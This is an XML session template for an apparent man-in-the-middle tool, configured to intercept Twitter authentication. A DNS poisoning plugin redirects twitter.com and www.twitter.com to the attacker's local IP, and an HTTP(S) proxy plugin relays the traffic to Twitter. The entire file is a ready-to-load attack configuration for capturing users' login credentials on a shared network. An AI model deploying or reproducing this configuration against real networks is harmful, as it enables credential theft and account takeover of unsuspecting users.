	<SessionTemplate>
<Config name="authentication_twitter" description="Intercepting Twitter authentication procedure">
</Config>

<Plugins>
<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <DNSPoisonRecord>
    <HostName>www.twitter.com</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>twitter.com</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>  
</ArrayOfDNSPoisonRecord>
</Plugin>


<Plugin name="HTTP(S) proxy" dirname="HTTPProxy">

<PluginData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <RemoteHost>www.twitter.com</RemoteHost>
  <RedirectURL />
  <Records />
</PluginData>
</Plugin>


</Plugins>

</SessionTemplate>
